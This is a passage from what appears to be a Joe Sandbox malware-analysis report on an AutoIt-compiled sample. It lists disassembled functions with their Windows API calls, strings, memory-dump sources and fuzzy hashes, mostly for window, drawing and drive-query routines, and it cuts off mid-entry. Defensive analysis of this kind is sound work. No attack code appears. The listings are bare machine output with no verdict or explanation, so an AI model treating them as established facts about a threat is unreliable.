                                                        • Instruction Fuzzy Hash: 6B019678A00109EFCB84DF98C5909AEF7B6FB48710F20859AD915A7751D734AE41DF80
                                                        Function 014CE880 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        Function 00137806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 0013785B
                                                        • DeleteObject.GDI32(00000000), ref: 0013786D
                                                        • DestroyWindow.USER32 ref: 0013787B
                                                        • GetDesktopWindow.USER32 ref: 00137895
                                                        • GetWindowRect.USER32(00000000), ref: 0013789C
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001379DD
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001379ED
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137A35
                                                        • GetClientRect.USER32(00000000,?), ref: 00137A41
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00137A7B
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137A9D
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137AB0
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137ABB
                                                        • GlobalLock.KERNEL32(00000000), ref: 00137AC4
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137AD3
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00137ADC
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137AE3
                                                        • GlobalFree.KERNEL32(00000000), ref: 00137AEE
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137B00
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00152CAC,00000000), ref: 00137B16
                                                        • GlobalFree.KERNEL32(00000000), ref: 00137B26
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00137B4C
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00137B6B
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137B8D
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137D7A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: 68235301afe6594e9b3c3a0159ace16a7b99ef7ed4ff27a835373fca36b9c19f
                                                        • Instruction ID: 1272b298f1739df00c3fc779ef257f836359f68f8f22e7bd20ac896e89eeef1e
                                                        • Opcode Fuzzy Hash: 68235301afe6594e9b3c3a0159ace16a7b99ef7ed4ff27a835373fca36b9c19f
                                                        • Instruction Fuzzy Hash: A6027BB5900115EFDB14DFA4DD89EAE7BB9FF49320F148158F905AB2A1CB30AD42CB60
                                                        Function 0014356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,0014F910), ref: 00143627
                                                        • IsWindowVisible.USER32(?), ref: 0014364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: 64129623adbb1e6e58e8db2178ae9306820fc8f53b477a8f58918593d80fed75
                                                        • Instruction ID: 99d23ce4ce4f7222dc13b84705f14cc67fe43c4acc045c13f6c71627b71c9dc4
                                                        • Opcode Fuzzy Hash: 64129623adbb1e6e58e8db2178ae9306820fc8f53b477a8f58918593d80fed75
                                                        • Instruction Fuzzy Hash: ECD172702043019FCB08EF10C555AAEB7A1AF95354F15846CF8956B3B3DB31EE8ACB52
                                                        Function 0014A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0014A630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0014A661
                                                        • GetSysColor.USER32(0000000F), ref: 0014A66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0014A687
                                                        • SelectObject.GDI32(?,00000000), ref: 0014A696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0014A6C1
                                                        • GetSysColor.USER32(00000010), ref: 0014A6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0014A6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 0014A6DF
                                                        • DeleteObject.GDI32(00000000), ref: 0014A6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0014A731
                                                        • FillRect.USER32(?,?,00000000), ref: 0014A763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014A78E
                                                          • Part of subcall function 0014A8CA: GetSysColor.USER32(00000012), ref: 0014A903
                                                          • Part of subcall function 0014A8CA: SetTextColor.GDI32(?,?), ref: 0014A907
                                                          • Part of subcall function 0014A8CA: GetSysColorBrush.USER32(0000000F), ref: 0014A91D
                                                          • Part of subcall function 0014A8CA: GetSysColor.USER32(0000000F), ref: 0014A928
                                                          • Part of subcall function 0014A8CA: GetSysColor.USER32(00000011), ref: 0014A945
                                                          • Part of subcall function 0014A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0014A953
                                                          • Part of subcall function 0014A8CA: SelectObject.GDI32(?,00000000), ref: 0014A964
                                                          • Part of subcall function 0014A8CA: SetBkColor.GDI32(?,00000000), ref: 0014A96D
                                                          • Part of subcall function 0014A8CA: SelectObject.GDI32(?,?), ref: 0014A97A
                                                          • Part of subcall function 0014A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0014A999
                                                          • Part of subcall function 0014A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0014A9B0
                                                          • Part of subcall function 0014A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0014A9C5
                                                          • Part of subcall function 0014A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0014A9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: 6f3e6e03228c9863a27d3ecd6720f8279eda9d4d14f85e266ee5fdf3d9ca76e1
                                                        • Instruction ID: 0bc04b7490faa1d988457336f5ed8381d086927eb2cd06f677c64292539ecca9
                                                        • Opcode Fuzzy Hash: 6f3e6e03228c9863a27d3ecd6720f8279eda9d4d14f85e266ee5fdf3d9ca76e1
                                                        • Instruction Fuzzy Hash: 66918C76008301EFD7109F64DC08A5B7BA9FF89321F510A2DF9629A2B1D771D986CB52
                                                        Function 001374AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 001374DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0013759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001375DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001375ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00137633
                                                        • GetClientRect.USER32(00000000,?), ref: 0013763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00137683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00137692
                                                        • GetStockObject.GDI32(00000011), ref: 001376A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 001376A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001376B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001376BF
                                                        • DeleteDC.GDI32(00000000), ref: 001376C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001376F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0013770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00137746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0013775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0013776B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0013779B
                                                        • GetStockObject.GDI32(00000011), ref: 001377A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001377B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001377BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: d1873d3b667dae066e84e612f878a6a8b547283f048ede1489b8bd53280ebff1
                                                        • Instruction ID: 728a39a0aa63f7e1fa61ccf72563dbf5034beab13076a3fbd9c709f3b3d66af9
                                                        • Opcode Fuzzy Hash: d1873d3b667dae066e84e612f878a6a8b547283f048ede1489b8bd53280ebff1
                                                        • Instruction Fuzzy Hash: 7CA175B5A40615BFEB14DBA4DC49FAE7B7AEB09710F004118FA15A76E1CB70AD41CB60
                                                        Function 0012AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012AD1E
                                                        • GetDriveTypeW.KERNEL32(?,0014FAC0,?,\\.\,0014F910), ref: 0012ADFB
                                                        • SetErrorMode.KERNEL32(00000000,0014FAC0,?,\\.\,0014F910), ref: 0012AF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 29b022e5eeb9a0a30f8dbf2998854d19c52fed5f9018989140872e5bd2d63027
                                                        • Instruction ID: 29e6c33571cc43c8503d447d2b65c1d69a82c51191a801b8e978e9ed2630f651
                                                        • Opcode Fuzzy Hash: 29b022e5eeb9a0a30f8dbf2998854d19c52fed5f9018989140872e5bd2d63027
                                                        • Instruction Fuzzy Hash: E151D6B1688319EBCB04DB10EA86DBD73B1EF087107A1805BF40BA7291DB349D62DB43
                                                        Function 000C68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: f50c1796167158467eff751cc9c595ef49e398f70dd81b1603fc64d2b212d2e6
                                                        • Instruction ID: e99b3fbee076f076100d0bf1ae41ecdbc3f23931896d2847fda03f3bb0977c6c
                                                        • Opcode Fuzzy Hash: f50c1796167158467eff751cc9c595ef49e398f70dd81b1603fc64d2b212d2e6
                                                        • Instruction Fuzzy Hash: 65811AB1644249AACB30AB61DC47FFE7BA8EF05700F14402CF9456B1D3EB72DA45D651
                                                        Function 00149A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00149AD2
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00149B8B
                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00149BA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: 0
                                                        • API String ID: 2326795674-4108050209
                                                        • Opcode ID: eb656008deee818738cab36798a8e42ab63cc3ed6a1392897f595dd36e35b3f3
                                                        • Instruction ID: 87e2028c1417bdd78b27bcb54fb217e86c00058061517b74d62e6125fa7fef98
                                                        • Opcode Fuzzy Hash: eb656008deee818738cab36798a8e42ab63cc3ed6a1392897f595dd36e35b3f3
                                                        • Instruction Fuzzy Hash: AB02BC70104201AFEB25CF24C889BABBBE5FF89314F04852DF999962B1C775D945CB92
                                                        Function 0014A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0014A903
                                                        • SetTextColor.GDI32(?,?), ref: 0014A907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0014A91D
                                                        • GetSysColor.USER32(0000000F), ref: 0014A928
                                                        • CreateSolidBrush.GDI32(?), ref: 0014A92D
                                                        • GetSysColor.USER32(00000011), ref: 0014A945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0014A953
                                                        • SelectObject.GDI32(?,00000000), ref: 0014A964
                                                        • SetBkColor.GDI32(?,00000000), ref: 0014A96D
                                                        • SelectObject.GDI32(?,?), ref: 0014A97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0014A999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0014A9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0014A9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0014A9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0014AA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0014AA32
                                                        • DrawFocusRect.USER32(?,?), ref: 0014AA3D
                                                        • GetSysColor.USER32(00000011), ref: 0014AA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 0014AA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0014AA67
                                                        • SelectObject.GDI32(?,0014A5FA), ref: 0014AA7E
                                                        • DeleteObject.GDI32(?), ref: 0014AA89
                                                        • SelectObject.GDI32(?,?), ref: 0014AA8F
                                                        • DeleteObject.GDI32(?), ref: 0014AA94
                                                        • SetTextColor.GDI32(?,?), ref: 0014AA9A
                                                        • SetBkColor.GDI32(?,?), ref: 0014AAA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 4449e0a42d0dff92f0bf281b7241059412c6cfa1a22fe949b488f70ff3b8f3f4
                                                        • Instruction ID: 2f32e1a5380c91802475930f06a6ca300d2cbd8df4df74f7ea4c01656d7f8527
                                                        • Opcode Fuzzy Hash: 4449e0a42d0dff92f0bf281b7241059412c6cfa1a22fe949b488f70ff3b8f3f4
                                                        • Instruction Fuzzy Hash: 81514C75900208FFDB109FA4DC48EAE7BB9EF49320F124629F911AB2B1D7719981DF90
                                                        Function 001489D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00148AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00148AD2
                                                        • CharNextW.USER32(0000014E), ref: 00148B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00148B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00148B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00148B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00148B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00148BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00148BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00148C1F
                                                        • _memset.LIBCMT ref: 00148C44
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00148C8D
                                                        • _memset.LIBCMT ref: 00148CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00148D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00148D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00148E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00148E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00148E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00148EB4
                                                        • DrawMenuBar.USER32(?), ref: 00148EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00148EEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: bef45903632165b2514003dd51a046c191912f336e9d89d50f471d4feef8b29d
                                                        • Instruction ID: ab10c91078bb02894f76913b05acd758439bb34a772c60b36785219c363003d0
                                                        • Opcode Fuzzy Hash: bef45903632165b2514003dd51a046c191912f336e9d89d50f471d4feef8b29d
                                                        • Instruction Fuzzy Hash: ECE193B4901208AFDF20DF55CC84EEE7BB9EF06710F11815AF915AB2A1DB709A85DF60
                                                        Function 0014488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 001449CA
                                                        • GetDesktopWindow.USER32 ref: 001449DF
                                                        • GetWindowRect.USER32(00000000), ref: 001449E6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00144A48
                                                        • DestroyWindow.USER32(?), ref: 00144A74
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00144A9D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00144ABB
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00144AE1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00144AF6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00144B09
                                                        • IsWindowVisible.USER32(?), ref: 00144B29
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00144B44
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00144B58
                                                        • GetWindowRect.USER32(?,?), ref: 00144B70
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00144B96
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00144BB0
                                                        • CopyRect.USER32(?,?), ref: 00144BC7
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00144C32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
